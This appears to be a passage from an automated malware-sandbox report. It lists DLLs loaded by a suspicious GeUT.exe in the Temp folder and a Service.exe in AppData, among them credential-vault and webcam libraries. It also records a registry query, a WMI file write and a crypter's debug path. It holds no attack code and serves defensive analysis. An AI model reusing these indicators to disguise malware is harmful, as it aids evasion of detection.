Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: loadperf.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.1508185282.00000000050F0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, 